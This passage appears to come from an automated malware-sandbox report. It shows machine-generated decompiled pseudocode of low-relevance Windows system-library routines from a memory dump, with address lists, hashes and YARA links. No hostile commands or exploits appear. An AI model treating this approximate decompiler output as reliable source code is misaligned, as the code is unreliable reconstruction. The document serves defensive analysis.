						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0540FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0540EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E05367D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E05401608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E05411536(0x5438ae4, (_t74 -  *0x5438b04 >> 0x14) + (_t74 -  *0x5438b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0540C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0540A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E053ECB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0540ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                      0x0540ae44
                                      0x0540ae4c
                                      0x0540ae53
                                      0x0540ae55
                                      0x0540ae5c
                                      0x0540ae64
                                      0x0540ae68
                                      0x0540ae75
                                      0x0540ae75
                                      0x0540ae78
                                      0x0540ae7a
                                      0x0540ae7c
                                      0x0540ae7f
                                      0x0540aea8
                                      0x0540aeab
                                      0x0540aead
                                      0x00000000
                                      0x00000000
                                      0x0540aeb3
                                      0x0540aeb8
                                      0x0540aebb
                                      0x0540aebd
                                      0x00000000
                                      0x0540ae81
                                      0x0540ae88
                                      0x0540ae8f
                                      0x0540ae9b
                                      0x0540ae96
                                      0x0540ae96
                                      0x0540ae96
                                      0x0540aea0
                                      0x0540aea3
                                      0x0540aebf
                                      0x0540aebf
                                      0x0540aec3
                                      0x0540aec9
                                      0x0540af0d
                                      0x0540af14
                                      0x0540af3d
                                      0x0540af3d
                                      0x0540af41
                                      0x0540af44
                                      0x0540af67
                                      0x0540af67
                                      0x0540af6a
                                      0x0540afca
                                      0x0540afd1
                                      0x00000000
                                      0x0540afd1
                                      0x0540af6c
                                      0x0540af6d
                                      0x0540af75
                                      0x0540af7c
                                      0x0540af7e
                                      0x0540af80
                                      0x0540af85
                                      0x0540af87
                                      0x0540af99
                                      0x0540af89
                                      0x0540af92
                                      0x0540af92
                                      0x0540af9e
                                      0x0540afa1
                                      0x0540afa3
                                      0x0540afa9
                                      0x0540afb0
                                      0x0540afb2
                                      0x0540afb4
                                      0x0540afbc
                                      0x0540afbc
                                      0x0540afb4
                                      0x0540afb0
                                      0x00000000
                                      0x0540afa1
                                      0x0540af4f
                                      0x0540af57
                                      0x0540af5c
                                      0x0540af5e
                                      0x00000000
                                      0x00000000
                                      0x0540af60
                                      0x0540af64
                                      0x0540af64
                                      0x00000000
                                      0x0540af64
                                      0x0540af1a
                                      0x0540af25
                                      0x00000000
                                      0x00000000
                                      0x0540af27
                                      0x0540af28
                                      0x0540af33
                                      0x00000000
                                      0x0540aed0
                                      0x0540aed0
                                      0x0540aed2
                                      0x0540aee1
                                      0x0540aee4
                                      0x00000000
                                      0x00000000
                                      0x0540aee6
                                      0x0540aeec
                                      0x00000000
                                      0x00000000
                                      0x0540aefb
                                      0x0540af07
                                      0x0540afd3
                                      0x0540afdb
                                      0x0540afdb
                                      0x00000000
                                      0x0540af07
                                      0x0540aed6
                                      0x0540aed8
                                      0x0540aedf
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0540aedf
                                      0x0540aec9

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 36c10f41e2465c122fb517f34af21d05bffe9386389304e701ad23c3cd51eebe
                                      • Instruction ID: 8c1f9084aef90a8bb0ca9cf84065abac634b022fa9dd89acf036fbc5f9be1f77
                                      • Opcode Fuzzy Hash: 36c10f41e2465c122fb517f34af21d05bffe9386389304e701ad23c3cd51eebe
                                      • Instruction Fuzzy Hash: 4E41D6717043119BC726DA27C888FBBB39ABF84620F24567AF9178B3D4D734D801C691
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0536DBE9, Relevance: .1, Instructions: 149COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E0536DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0534CC50(E05344510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E05367D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E05418ED6(_t102, _t98);
						}
						_t76 = _v44;
						E05362280(_t58, _v44);
						E0536DD82(_v44, _t102, _t98);
						E0536B944(_t102, _v5);
						return E0535FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x5438628; // 0x0
							_v28 = _t67;
							_t68 =  *0x543862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x5438628; // 0x0
						_t105 = _v28;
						_t80 =  *0x543862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x540fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                      0x0536dbe9
                                      0x0536dbf2
                                      0x0536dbf7
                                      0x0536dbf9
                                      0x0536dbfc
                                      0x0536dc00
                                      0x0536dc03
                                      0x0536dc14
                                      0x0536dd54
                                      0x0536dd54
                                      0x0536dd54
                                      0x0536dc18
                                      0x0536dc1d
                                      0x0536dc1d
                                      0x0536dc32
                                      0x0536dc3b
                                      0x0536dc3e
                                      0x0536dc46
                                      0x0536dd5b
                                      0x0536dd62
                                      0x0536dd64
                                      0x0536dd67
                                      0x0536dd69
                                      0x0536dd6b
                                      0x0536dd6e
                                      0x0536dd70
                                      0x0536dd73
                                      0x0536dd73
                                      0x00000000
                                      0x0536dc4c
                                      0x0536dc4e
                                      0x053b3ae3
                                      0x053b3ae8
                                      0x053b3aea
                                      0x0536dce7
                                      0x0536dce9
                                      0x0536dcec
                                      0x0536dcee
                                      0x0536dcf0
                                      0x0536dcf3
                                      0x0536dcf5
                                      0x053b3af2
                                      0x053b3af5
                                      0x053b3af5
                                      0x0536dd06
                                      0x0536dd08
                                      0x0536dd0b
                                      0x0536dd12
                                      0x053b3b08
                                      0x0536dd18
                                      0x0536dd18
                                      0x0536dd18
                                      0x0536dd20
                                      0x0536dd23
                                      0x053b3b16
                                      0x053b3b16
                                      0x0536dd29
                                      0x0536dd2d
                                      0x0536dd36
                                      0x0536dd40
                                      0x0536dd51
                                      0x0536dd51
                                      0x0536dc54
                                      0x0536dc59
                                      0x0536dc59
                                      0x0536dc5e
                                      0x0536dc5e
                                      0x0536dc63
                                      0x0536dc66
                                      0x0536dc6b
                                      0x0536dc78
                                      0x0536dc7b
                                      0x0536dc81
                                      0x0536dc81
                                      0x0536dc83
                                      0x0536dc89
                                      0x00000000
                                      0x00000000
                                      0x0536dd7b
                                      0x0536dd7b
                                      0x0536dc8f
                                      0x0536dc8f
                                      0x0536dc92
                                      0x0536dc99
                                      0x0536dc9f
                                      0x0536dca5
                                      0x0536dcaa
                                      0x0536dcaa
                                      0x0536dcb3
                                      0x0536dcb8
                                      0x0536dcbb
                                      0x0536dcc1
                                      0x0536dccf
                                      0x0536dcd2
                                      0x0536dcd5
                                      0x0536dcd7
                                      0x0536dcda
                                      0x0536dcdc
                                      0x0536dcdc
                                      0x0536dce2
                                      0x0536dce4
                                      0x00000000
                                      0x0536dce4

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 467be1f9a28ebbc4cd369bd51427f60aa6d49a63849c37230437b1bd6d83475c
                                      • Instruction ID: d679758165585fcc124ad38878dc5c3c7bef4730aba41d3347274fab55909ca4
                                      • Opcode Fuzzy Hash: 467be1f9a28ebbc4cd369bd51427f60aa6d49a63849c37230437b1bd6d83475c
                                      • Instruction Fuzzy Hash: 03519CB1B01619DFCB14DF68C490AAEFBF6BF48310F20896ED955A7348DB70A944CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0535EF40, Relevance: .1, Instructions: 147COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E0535EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E05349080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x770bc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E05342D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                      0x0535ef4b
                                      0x0535ef4d
                                      0x0535ef57
                                      0x0535f0bd
                                      0x0535f0c2
                                      0x0535f0d2
                                      0x0535f0d2
                                      0x0535f0c2
                                      0x0535ef5d
                                      0x0535ef5f
                                      0x0535ef67
                                      0x0535ef6a
                                      0x0535ef6d
                                      0x0535ef74
                                      0x0535ef7f
                                      0x0535ef82
                                      0x0535ef82
                                      0x0535ef86
                                      0x0535ef88
                                      0x0535ef8c
                                      0x0535ef8f
                                      0x0535ef8f
                                      0x0535ef8f
                                      0x00000000
                                      0x0535ef91
                                      0x0535ef93
                                      0x0535efc4
                                      0x0535efc4
                                      0x0535efc4
                                      0x0535efca
                                      0x0535efd0
                                      0x0535f0a6
                                      0x00000000
                                      0x00000000
                                      0x0535f0af
                                      0x053abb06
                                      0x053abb0a
                                      0x0535f0b5
                                      0x0535f0b5
                                      0x0535f0b5
                                      0x0535f0b5
                                      0x00000000
                                      0x0535efd6
                                      0x0535efd9
                                      0x0535f0de
                                      0x0535f0e2
                                      0x0535efdf
                                      0x0535efdf
                                      0x0535efdf
                                      0x0535efe5
                                      0x053abafc
                                      0x053abafc
                                      0x0535efe5
                                      0x0535efeb
                                      0x0535efed
                                      0x0535f00f
                                      0x0535f011
                                      0x0535f01a
                                      0x0535f01d
                                      0x0535f021
                                      0x0535f028
                                      0x0535f029
                                      0x0535f029
                                      0x0535f02c
                                      0x00000000
                                      0x0535f02c
                                      0x0535eff3
                                      0x0535eff9
                                      0x0535f0ea
                                      0x0535f0ed
                                      0x0535f0ef
                                      0x00000000
                                      0x0535f0ef
                                      0x0535f003
                                      0x053abb12
                                      0x0535f045
                                      0x0535f049
                                      0x0535f051
                                      0x0535f09e
                                      0x0535f0a0
                                      0x0535f0a0
                                      0x0535f09e
                                      0x0535f053
                                      0x0535f064
                                      0x0535f064
                                      0x0535f06b
                                      0x053abb1a
                                      0x053abb1a
                                      0x0535f071
                                      0x0535f071
                                      0x0535f07d
                                      0x0535f082
                                      0x0535f08f
                                      0x0535f08f
                                      0x0535f009
                                      0x0535f00d
                                      0x00000000
                                      0x0535f00d
                                      0x0535efd0
                                      0x0535ef97
                                      0x0535efa5
                                      0x0535efaa
                                      0x00000000
                                      0x0535efac
                                      0x0535efac
                                      0x0535efac
                                      0x00000000
                                      0x0535efb2
                                      0x0535f036
                                      0x0535f03a
                                      0x0535f040
                                      0x0535f090
                                      0x00000000
                                      0x0535f092
                                      0x0535f042
                                      0x00000000
                                      0x0535f042
                                      0x0535efb7
                                      0x0535efb9
                                      0x0535efbc
                                      0x0535efb0
                                      0x0535efb0
                                      0x00000000
                                      0x0535efbe
                                      0x0535efbe
                                      0x0535efc1
                                      0x00000000
                                      0x0535efc1
                                      0x0535efbc
                                      0x0535efaa
                                      0x0535ef91

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                      • Instruction ID: 8f19bec7f45767cc1aaa871fa87d13c37cbc29dda46ad96f86742391a1a4ebd1
                                      • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                      • Instruction Fuzzy Hash: 6C512470A08245DFDB10CB68C0D0FAEFBB6BF05324F1891A8EC5593281C7B5AA89D751
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0541740D, Relevance: .1, Instructions: 141COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 84%
                                      			E0541740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0539D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0538F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L05364620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L05364620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0538F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L05364620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                      0x0541740d
                                      0x0541740d
                                      0x05417412
                                      0x05417413
                                      0x05417416
                                      0x05417418
                                      0x0541741c
                                      0x0541741f
                                      0x05417422
                                      0x05417422
                                      0x05417428
                                      0x0541742a
                                      0x0541742a
                                      0x05417451
                                      0x05417432
                                      0x0541744f
                                      0x0541744f
                                      0x00000000
                                      0x05417434
                                      0x05417438
                                      0x05417443
                                      0x05417517
                                      0x05417517
                                      0x0541751a
                                      0x05417535
                                      0x05417520
                                      0x05417527
                                      0x0541752c
                                      0x05417531
                                      0x05417533
                                      0x00000000
                                      0x05417533
                                      0x00000000
                                      0x05417531
                                      0x0541754b
                                      0x0541754f
                                      0x0541755c
                                      0x0541755c
                                      0x0541755f
                                      0x05417560
                                      0x05417561
                                      0x05417562
                                      0x05417563
                                      0x05417568
                                      0x0541756a
                                      0x0541756c
                                      0x0541756d
                                      0x0541756d
                                      0x0541756f
                                      0x05417572
                                      0x05417574
                                      0x05417577
                                      0x0541757c
                                      0x0541757f
                                      0x00000000
                                      0x05417551
                                      0x05417551
                                      0x05417551
                                      0x05417553
                                      0x05417553
                                      0x05417449
                                      0x05417449
                                      0x0541744c
                                      0x0541744c
                                      0x00000000
                                      0x0541744c
                                      0x05417443
                                      0x0541750e
                                      0x05417514
                                      0x05417514
                                      0x05417455
                                      0x05417469
                                      0x0541746d
                                      0x00000000
                                      0x05417473
                                      0x05417473
                                      0x05417476
                                      0x05417480
                                      0x05417484
                                      0x0541748e
                                      0x05417493
                                      0x05417493
                                      0x05417496
                                      0x05417499
                                      0x054174a1
                                      0x054174b1
                                      0x054174b5
                                      0x00000000
                                      0x054174bb
                                      0x054174c1
                                      0x054174c1
                                      0x054174c4
                                      0x054174c5
                                      0x054174c6
                                      0x054174c7
                                      0x054174c8
                                      0x054174cd
                                      0x00000000
                                      0x054174d3
                                      0x054174d3
                                      0x054174d6
                                      0x054174d8
                                      0x054174db
                                      0x054174dd
                                      0x054174e0
                                      0x054174e7
                                      0x054174ee
                                      0x054174ee
                                      0x054174f4
                                      0x054174f9
                                      0x00000000
                                      0x054174fb
                                      0x054174fb
                                      0x054174fd
                                      0x05417500
                                      0x05417503
                                      0x05417505
                                      0x05417505
                                      0x054174f9
                                      0x00000000
                                      0x054174cd
                                      0x054174b5
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                      • Instruction ID: 3f30004b583885d91274e3220a36be22c7185497b98dd45b43b5c369596af0af
                                      • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                      • Instruction Fuzzy Hash: 6B518C71600606EFCB15CF54C980EA6BBB5FF45304F15C1AAE9089F212E771EA46CBE4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05372990, Relevance: .1, Instructions: 133COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 97%
                                      			E05372990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x541ff00);
				E0539D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x5321664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0538E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x5321668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E053C51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x532166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
